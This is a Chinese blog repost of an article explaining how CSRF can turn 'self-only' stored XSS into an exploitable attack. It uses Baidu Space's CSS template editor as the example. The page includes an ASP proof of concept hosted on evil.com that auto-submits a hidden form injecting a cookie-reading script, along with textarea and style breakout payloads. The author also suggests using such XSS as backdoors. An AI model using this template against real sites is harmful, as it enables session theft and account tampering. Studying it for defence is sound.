基于CSRF的XSS攻击

最新推荐文章于 2024-09-05 17:12:12 发布
最新推荐文章于 2024-09-05 17:12:12 发布
阅读量677 收藏
点赞数
分类专栏: XSS 文章标签: csrf input 百度 css action c

# 鬼仔:作者的原文被和谐 了。

作者:余弦

有些XSS不好利用啊,比如有些后台的XSS漏洞,你进不了别人的后台,怎么能 利用他的XSS漏洞呢?进得了别人的后台,还利用这个XSS漏洞干什么?其实这个时候可以种个后门(如果那是个持久型的XSS,这是后话)。有些被称为鸡 肋的XSS漏洞其实很多时候是因为没有找到合适的利用方式而已。

比如百度空间的自定义模板处,那里还有两处持久型的XSS漏洞,一个是在编辑CSS的textarea中写入这样的代 码</textarea><script>alert(‘xss’)< /script><textarea>,然后保存该模板后会出现跨站;还有一个是在编辑CSS的textarea中写入< /style><script>alert(document.cookie)< /script><style>,点击“预览”会出现跨站。这样的过程似乎只能跨自己?不对!利用CSRF可以使得这些不好利用的 XSS漏洞变得同样威力无穷。

比如:

一个攻击者构造的页面http://www.evil.com/csrf-xss-baiduhi.asp 的代码如下:

<%

s = "<form method='post' action='http://hi.baidu.com/yuxi4n/commit'>"

s = s+"<input type='text' style='display:none!important;display:block;width=0;height=0' value='5' name='ct'/>"

s = s+"<input type='text' style='display:none!important;display:block;width=0;height=0' value='1' name='spCssUse'/>"

s = s+"<input type='text' style='display:none!important;display:block;width=0;height=0' value='1' name='spCssColorID'/>"

s = s+"<input type='text' style='display:none!important;display:block;width=0;height=0' value='-1' name='spCssLayoutID'/>"

s = s+"<input type='text' style='display:none!important;display:block;width=0;height=0' value='http://hi.baidu.com/yuxi4n/modify/spcss/20f51f4f94129a36aec3ab11.css/edit' name='spRefURL'/>"

s = s+"<input type='text' style='display:none!important;display:block;width=0;height=0' value='5' name='cm'/>"

s = s+"<input type='text' style='display:none!important;display:block;width=0;height=0' value='</style><script>alert(document.cookie)</script><style>' name='spCssText'/>"

s = s+"<input type='text' style='display:none!important;display:block;width=0;height=0' value='abc' name='spCssName'/>"

s = s+"<input type='text' style='display:none!important;display:block;width=0;height=0' value='0' name='spCssTag'/>"

s = s+"</form>"

s = s+"<script>document.forms[0].submit();</script>"

Response.write(s)

%>

被攻击者yuxi4n访问这个链接时就被CSRF了,接着就是XSS的出现:)。XSS能做什么就做什么了。上面的CSRF代码提交了自定义模板表 单并执行了预览功能。预览的时候就跨了。CSRF可以做的很隐蔽。上次xKungfoo回来后和monyer聊的就是这个,当时百度C2C内某处的预览功 能就存在这样的XSS。很多人认为根本没办法利用,然后结合CSRF呢?monyer给他们演示后,现在这个漏洞被修补了。

同样的问题出现在很多网站上,恩,假如CSRF防御做得好的话就不用担心这个了,不过我们可以利用这样被忽略的XSS漏洞做后门,假如有这个机会的话。

 

转自:http://huaidan.org/archives/2561.html

fallinsky
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XSS及CSRF攻击防御
zl的博客
08-17 1万+
一、概念: XSS攻击全称跨站脚本攻击(Cross Site Scripting); CSRF(Cross-site request forgery)跨站请求伪造,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF; 二、XSS 什么是 XSS ? XSS (Cross Site Scripting),即跨站脚本攻击,是一种常见于...
XSS、CSRF攻击以及预防手段
南栀的博客
03-12 4889
文章目录XSS反射型持久型DOM型XSS如何防御?CSRF XSS XSS全程Cross Site Scripting,名为跨站脚本攻击,是一种常见于 Web 应用中的计算机安全漏洞。 恶意攻击者往 Web 页面里嵌入恶意的客户端脚本,当用户浏览此网页时,脚本就会在用户的浏览器上执行,进而达到攻击者的目的。 比如获取用户的 Cookie、导航到恶意网站、携带木马等。 攻击者对客户端网页注入的恶意脚本一般包括 JavaScript,有时也会包含 HTML 和 Flash。 有很多种方式进行 XSS 攻击,但它
新手教程:如何利用CSRF执行XSS攻击
kaitoulee
05-23 1486
我将拿出最近发生的一个例子,讲解如何将一些低级别的风险连接起来形成一个向量,然后达到攻击的目的。 背景介绍 首先介绍背景条件,我发现一个网站的用户资料页面上有一个持久性XSS漏洞。然而只能是用户修改自己的用户名,针对自己触发XSS。其它用户都不能遇到这个XSS攻击。 看起来难以利用,对不对?我们一般都会这样想,通常认为它只是一个风险,有时候会修复它,但是一般都不会,毕竟无法利用它
XSS CSRF 攻击
weixin_33705053的博客
11-19 64
XSS:跨站脚本(Cross-site scripting)CSRF:跨站请求伪造(Cross-site request forgery)定义:跨网站脚本(Cross-site scripting,通常简称为XSS或跨站脚本或跨站脚本攻击),为了与层叠样式表(Cascading Style Sheets)区分,故命名为XSSXSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指...
SpringMVC防御CSRFXSS攻击(写的非常好)
qq_31457665的博客
08-02 1万+
本文转自:https://www.cnblogs.com/lupeng2010/p/6518053.html 最近在研究关于web网络安全的知识,本来正在整理相关的资料准备些些关于crsf及xss攻击的东西,结果搜到了这篇文章。。。。。讲的非常的好,从基本原理,到问题场景举例,再到问题解决详尽且严密。果断转了,以下是作者原文,未做改动。 本文说一下SpringMVC如...
什么是CSRF?可能多数人都不清楚,没事,一起来了解!!!
热门推荐
lajos的博客
06-23 3万+
        CSRF即跨站请求攻击。简单的说,是攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己以前认证过的站点并运行一些操作(如发邮件,发消息,甚至财产操作(如转账和购买商品))。因为浏览器之前认证过,所以被访问的站点会绝点是这是真正的用户操作而去运行。        这就利用了web中用户身份认证验证的一个漏洞:简单的身份验证仅仅能保证请求发自某个用户的浏览器,却不能保证请求本身是用户...
XSS攻击CSRF攻击
weixin_47198976的博客
08-28 407
XSS攻击CSRF攻击
XSS 和 CSRF 攻击详解
xnxqwzy的博客
05-01 405
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
XSS和CSRF的攻击-学习记录
weixin_45392204的博客
09-01 157
攻击者通过在受信任的网页中插入恶意脚本,使其在用户的浏览器中执行。攻击者可以利用XSS攻击来盗取用户的身份信息、篡改网页内容、劫持用户会话或进行其他恶意活动。通俗点说就是,不需要用户做任何的登录认证,过合法的操作(比如在url中输入、在评论框中输入),向你的页面注入脚本(可能是js、hmtl代码块等),然后让被害者点击。
TokenBasedUnsafe:一个展示XSS和CSRF攻击的网站
05-14
使用JSON Web令牌(JWT)的基于令牌的用户身份验证。 使用RSA算法对JWT中的数据进行加密和解密。 后端是使用nodejs和expressjs构建的。 前端是使用带有React钩子的... Webiste演示了XSS和CSRF攻击是如何发生的。
CSRF,SSRF和重放攻击的区别
最新发布
weixin_61074128的博客
09-05 258
SSRF,全称Server-Side Request Forgery,是一种由攻击者构造请求,使服务器端发起请求的安全漏洞。重放攻击(Replay Attacks),又称重播攻击、回放攻击,是指攻击者发送一个目的主机已接收过的包,以达到欺骗系统的目的。攻击者通过伪造用户的请求,利用用户对网站的信任,诱导用户在其不知情的情况下执行某些操作,如转账、提交表单等。攻击者将截获的数据包重新发送给目标系统,以欺骗系统认为是一次新的有效请求。在服务器端验证请求的时效性,拒绝过期的请求。对请求地址进行严格的过滤和验证。
在 eggjs 中忽略 CSRF
南城
09-02 354
通过以上方法,你可以在 Egg.js 中根据需要忽略 CSRF 保护。选择合适的方法来处理 CSRF 令牌问题,确保在禁用 CSRF 保护时考虑到安全性。
通过组合Self-XSS + CSRF得到存储型XSS
2301_80127209的博客
09-05 438
在一次漏洞赏金挖掘中,我在更改用户名的功能点出发现了一个XSS,在修改用户名的地方添加了一个简单的XSS payload并且刷新页面
【网络安全】CSRF漏洞—CSRF基础漏洞防御
goldfish8848的博客
09-01 940
跨站点的请求请求是伪造的(假装可信)Cross-Site Request Forgery,跨站请求伪造。它是一种挟持用户在当前已登陆的Web应用程序上执行非本意的操作的攻击方法。同源策略是浏览器的一个安全功能,不同源的客户端脚本在没有明确授权的情况下,不能读写对方资源。所以xyz.com下的js脚本采用ajax读取abc.com里面的文件数据会被拒绝同源策略限制了从同一个源加载的文档或脚本如何与来自另一个源的资源进行交互。这是一个用于隔离潜在恶意文件的重要安全机制。
百度飞将 paddle ,实现贝叶斯神经网络 bayesue neure network bnn,aistudio公开项目 复现效果不好
09-03 1439
本文将不确定性引入神经网络,将确定性参数的神经网络改造为具有随机特性的概率神经网络(也成贝叶斯神经网络)。本文是贝叶斯神经网络的奠基作之一,具有很高的引用量。具体地,在传统神经网络中,各网络节点的参数为确定值;通过本文方法引入不确定性后,各网络节点的参数转变为满足概率分布的随机变量。每次正向推理时,网络会根据概率分布对参数值进行采样,并以采样到的值作为本次正向推理的参数值。
四战搜索,抖音难造“百度
09-05 1086
来自第三方statcounter的数据显示,2024年6月,我国手机端搜索引擎市场中,市场份额占比最大的是百度,市场份额占比69.09%,其次是必应,市场份额占比13.88%,搜狗以5.40%的占比名列第三。「新熵」试用下来发现,现阶段的抖音搜索App,更像是抖音内置搜索功能的简化版本,可以使用抖音账号登录关联好友关系等信息,同时也包含短视频界面,用户可以无缝衔接到视频的瀑布流中,点击底部"+" 可以发抖音视频。在抖音,随手搜已经变成自然而然的习惯行为,同时也是一座尚未充分挖掘的宝矿,即海量的内容沉淀。
zblog自动生成文章插件(百度AI写作配图,图文并茂)
网站系统开发
09-05 785
本自动生成文章AI配图插件适用于zblog系统,全自动写作配图,自动更新网站。利用百度文心一言AI写作+阿里通义万相AI智能配图两大API实现网站SEO优化,全自动生成图文并茂的文章。不用再花费额外时间和精力去维护网站,每天定时自动生成SEO配图文章自动发布。你只需要准备好自己的关键词就可以自动生成文章。
理解XSS与CSRF:攻击原理与防御策略
XSS攻击是攻击者利用网站对用户输入的数据处理不当,将恶意脚本注入到网页中,当用户访问被注入的页面时,这些脚本被执行,导致用户浏览器行为被操纵或者敏感信息被盗取。XSS攻击通常分为三类: 1.1 反射型(非持久...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值